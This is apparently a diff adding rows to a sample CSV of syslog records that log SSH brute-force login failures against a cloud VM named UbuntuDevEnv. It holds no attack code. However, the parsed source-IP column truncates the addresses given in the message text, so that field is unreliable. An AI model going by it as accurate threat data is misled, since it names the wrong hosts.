+15766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:28,UbuntuDevEnv,2019-06-26 08:40:28,auth,UbuntuDevEnv,info,Failed password for invalid user abc from 185.103.243.78 port 41120 ssh2,59854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abc,185.103.243.7,41120,,
+15767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:28,UbuntuDevEnv,2019-06-26 08:40:28,auth,UbuntuDevEnv,info,Disconnected from invalid user abc 185.103.243.78 port 41120 [preauth],59854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,abc,185.103.243.7,41120,,
+15768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:28,UbuntuDevEnv,2019-06-26 08:40:28,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 41120:11: Bye Bye [preauth],59854,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,41120,,
+15769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:30,UbuntuDevEnv,2019-06-26 08:40:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74  user=root,59873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,183.47.14.7,,0,
+15770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:32,UbuntuDevEnv,2019-06-26 08:40:31,auth,UbuntuDevEnv,info,Failed password for root from 183.47.14.74 port 34928 ssh2,59873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,34928,,
+15771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:33,UbuntuDevEnv,2019-06-26 08:40:32,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 183.47.14.74 port 34928 [preauth],59873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,183.47.14.7,34928,,
+15772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:40:33,UbuntuDevEnv,2019-06-26 08:40:32,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 34928:11: Bye Bye [preauth],59873,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,34928,,
+15773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:41,UbuntuDevEnv,2019-06-26 08:43:41,auth,UbuntuDevEnv,info,Invalid user sheng from 143.0.52.117 port 58260,60548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sheng,143.0.52.1,58260,,
+15774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:41,UbuntuDevEnv,2019-06-26 08:43:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:41,UbuntuDevEnv,2019-06-26 08:43:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,60548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+15776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:43,UbuntuDevEnv,2019-06-26 08:43:43,auth,UbuntuDevEnv,info,Failed password for invalid user sheng from 143.0.52.117 port 58260 ssh2,60548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sheng,143.0.52.1,58260,,
+15777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:44,UbuntuDevEnv,2019-06-26 08:43:43,auth,UbuntuDevEnv,info,Disconnected from invalid user sheng 143.0.52.117 port 58260 [preauth],60548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sheng,143.0.52.1,58260,,
+15778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:44,UbuntuDevEnv,2019-06-26 08:43:43,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 58260:11: Bye Bye [preauth],60548,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,58260,,
+15779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:58,UbuntuDevEnv,2019-06-26 08:43:57,auth,UbuntuDevEnv,info,Invalid user plesk from 185.103.243.78 port 44094,60599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plesk,185.103.243.7,44094,,
+15780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:58,UbuntuDevEnv,2019-06-26 08:43:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:58,UbuntuDevEnv,2019-06-26 08:43:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=185.103.243.78,60599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,185.103.243.7,,0,
+15782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:58,UbuntuDevEnv,2019-06-26 08:43:58,auth,UbuntuDevEnv,info,Invalid user samba from 183.47.14.74 port 50827,60609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samba,183.47.14.7,50827,,
+15783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:58,UbuntuDevEnv,2019-06-26 08:43:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=183.47.14.74,60609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,183.47.14.7,,0,
+15784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:43:58,UbuntuDevEnv,2019-06-26 08:43:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:44:00,UbuntuDevEnv,2019-06-26 08:43:59,auth,UbuntuDevEnv,info,Failed password for invalid user plesk from 185.103.243.78 port 44094 ssh2,60599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plesk,185.103.243.7,44094,,
+15786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:44:00,UbuntuDevEnv,2019-06-26 08:43:59,auth,UbuntuDevEnv,info,Received disconnect from 185.103.243.78 port 44094:11: Bye Bye [preauth],60599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,185.103.243.7,44094,,
+15787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:44:00,UbuntuDevEnv,2019-06-26 08:43:59,auth,UbuntuDevEnv,info,Disconnected from invalid user plesk 185.103.243.78 port 44094 [preauth],60599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,plesk,185.103.243.7,44094,,
+15788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:44:01,UbuntuDevEnv,2019-06-26 08:44:00,auth,UbuntuDevEnv,info,Failed password for invalid user samba from 183.47.14.74 port 50827 ssh2,60609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samba,183.47.14.7,50827,,
+15789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:44:01,UbuntuDevEnv,2019-06-26 08:44:00,auth,UbuntuDevEnv,info,Disconnected from invalid user samba 183.47.14.74 port 50827 [preauth],60609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samba,183.47.14.7,50827,,
+15790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:44:01,UbuntuDevEnv,2019-06-26 08:44:00,auth,UbuntuDevEnv,info,Received disconnect from 183.47.14.74 port 50827:11: Bye Bye [preauth],60609,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,183.47.14.7,50827,,
+15791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:32,UbuntuDevEnv,2019-06-26 08:45:31,auth,UbuntuDevEnv,info,Invalid user lune from 143.0.52.117 port 38572,60971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lune,143.0.52.1,38572,,
+15792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:32,UbuntuDevEnv,2019-06-26 08:45:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=143.0.52.117,60971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,143.0.52.1,,0,
+15793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:32,UbuntuDevEnv,2019-06-26 08:45:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,60971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:34,UbuntuDevEnv,2019-06-26 08:45:33,auth,UbuntuDevEnv,info,Failed password for invalid user lune from 143.0.52.117 port 38572 ssh2,60971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lune,143.0.52.1,38572,,
+15795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:34,UbuntuDevEnv,2019-06-26 08:45:34,auth,UbuntuDevEnv,info,Received disconnect from 143.0.52.117 port 38572:11: Bye Bye [preauth],60971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,143.0.52.1,38572,,
+15796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 08:45:34,UbuntuDevEnv,2019-06-26 08:45:34,auth,UbuntuDevEnv,info,Disconnected from invalid user lune 143.0.52.117 port 38572 [preauth],60971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lune,143.0.52.1,38572,,
+15797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:27:33,UbuntuDevEnv,2019-06-26 05:27:33,auth,UbuntuDevEnv,info,Invalid user courier from 140.143.223.242 port 47362,10644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,courier,140.143.223.2,47362,,
+15798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:27:33,UbuntuDevEnv,2019-06-26 05:27:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:27:33,UbuntuDevEnv,2019-06-26 05:27:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,10644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:27:36,UbuntuDevEnv,2019-06-26 05:27:35,auth,UbuntuDevEnv,info,Failed password for invalid user courier from 140.143.223.242 port 47362 ssh2,10644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,courier,140.143.223.2,47362,,
+15801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:27:36,UbuntuDevEnv,2019-06-26 05:27:36,auth,UbuntuDevEnv,info,Disconnected from invalid user courier 140.143.223.242 port 47362 [preauth],10644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,courier,140.143.223.2,47362,,
+15802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:27:36,UbuntuDevEnv,2019-06-26 05:27:36,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 47362:11: Bye Bye [preauth],10644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,47362,,
+15803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:29:47,UbuntuDevEnv,2019-06-26 05:29:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242  user=test,11113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,140.143.223.2,,0,
+15804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:29:49,UbuntuDevEnv,2019-06-26 05:29:49,auth,UbuntuDevEnv,info,Failed password for test from 140.143.223.242 port 34470 ssh2,11113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,34470,,
+15805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:29:51,UbuntuDevEnv,2019-06-26 05:29:50,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 34470:11: Bye Bye [preauth],11113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,34470,,
+15806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:29:51,UbuntuDevEnv,2019-06-26 05:29:50,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 140.143.223.242 port 34470 [preauth],11113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,140.143.223.2,34470,,
+15807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:38:17,UbuntuDevEnv,2019-06-26 05:38:17,auth,UbuntuDevEnv,info,Invalid user lou from 140.143.223.242 port 39366,13021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,140.143.223.2,39366,,
+15808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:38:17,UbuntuDevEnv,2019-06-26 05:38:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:38:17,UbuntuDevEnv,2019-06-26 05:38:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,13021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:38:19,UbuntuDevEnv,2019-06-26 05:38:18,auth,UbuntuDevEnv,info,Failed password for invalid user lou from 140.143.223.242 port 39366 ssh2,13021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,140.143.223.2,39366,,
+15811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:38:19,UbuntuDevEnv,2019-06-26 05:38:19,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 39366:11: Bye Bye [preauth],13021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,39366,,
+15812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:38:19,UbuntuDevEnv,2019-06-26 05:38:19,auth,UbuntuDevEnv,info,Disconnected from invalid user lou 140.143.223.242 port 39366 [preauth],13021,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lou,140.143.223.2,39366,,
+15813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:42:20,UbuntuDevEnv,2019-06-26 05:42:20,auth,UbuntuDevEnv,info,Invalid user Perfect from 140.143.223.242 port 41792,13875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Perfect,140.143.223.2,41792,,
+15814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:42:20,UbuntuDevEnv,2019-06-26 05:42:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:42:20,UbuntuDevEnv,2019-06-26 05:42:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,13875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:42:22,UbuntuDevEnv,2019-06-26 05:42:22,auth,UbuntuDevEnv,info,Failed password for invalid user Perfect from 140.143.223.242 port 41792 ssh2,13875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Perfect,140.143.223.2,41792,,
+15817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:42:23,UbuntuDevEnv,2019-06-26 05:42:22,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 41792:11: Bye Bye [preauth],13875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,41792,,
+15818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:42:23,UbuntuDevEnv,2019-06-26 05:42:22,auth,UbuntuDevEnv,info,Disconnected from invalid user Perfect 140.143.223.242 port 41792 [preauth],13875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Perfect,140.143.223.2,41792,,
+15819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:01:32,UbuntuDevEnv,2019-06-26 06:01:32,auth,UbuntuDevEnv,info,Invalid user wang from 106.12.27.140 port 27268,18195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,106.12.27.1,27268,,
+15820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:01:33,UbuntuDevEnv,2019-06-26 06:01:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,18195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:01:33,UbuntuDevEnv,2019-06-26 06:01:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:01:34,UbuntuDevEnv,2019-06-26 06:01:34,auth,UbuntuDevEnv,info,Failed password for invalid user wang from 106.12.27.140 port 27268 ssh2,18195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,106.12.27.1,27268,,
+15823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:01:35,UbuntuDevEnv,2019-06-26 06:01:34,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 27268:11: Bye Bye [preauth],18195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,27268,,
+15824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:01:35,UbuntuDevEnv,2019-06-26 06:01:34,auth,UbuntuDevEnv,info,Disconnected from invalid user wang 106.12.27.140 port 27268 [preauth],18195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,106.12.27.1,27268,,
+15825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:02:41,UbuntuDevEnv,2019-06-26 06:02:41,auth,UbuntuDevEnv,info,Invalid user cu from 106.12.27.140 port 35246,18436,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cu,106.12.27.1,35246,,
